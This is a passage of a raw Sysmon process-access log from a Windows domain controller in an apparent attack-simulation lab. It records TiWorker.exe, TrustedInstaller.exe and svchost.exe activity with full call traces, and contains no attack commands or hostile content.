em32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.398{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.383{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.367{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.351{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:30.336{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 